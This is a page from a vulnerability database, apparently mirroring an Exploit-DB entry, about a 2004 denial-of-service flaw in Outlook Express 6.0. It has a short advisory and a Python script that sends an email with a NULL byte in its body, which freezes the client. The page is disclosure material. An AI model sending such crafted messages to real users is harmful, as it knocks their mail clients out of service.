Microsoft Outlook Express 6.0 - Remote Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054445 漏洞类型
发布时间 2004-04-14 更新时间 2004-04-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24002
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10144/info

Microsoft Outlook and Outlook Express have been reported prone to a remote denial of service vulnerability. The issue is reported to present itself when a NULL is encountered in the message body of an e-mail.

It is reported that when the vulnerable software encounters a malicious e-mail as described above, the GUI will cease to respond.

A remote attacker may potentially exploit this condition to deny service to Microsoft Outlook and Outlook Express users.

import smtplib
from_address = "nobody@example.com"
to_address = "nobody@example.com"
message = "Before\r\n\000\r\nAfter"
smtp = smtplib.SMTP("localhost")
smtp.set_debuglevel(1)
smtp.sendmail(from_address, [to_address], message)
smtp.quit()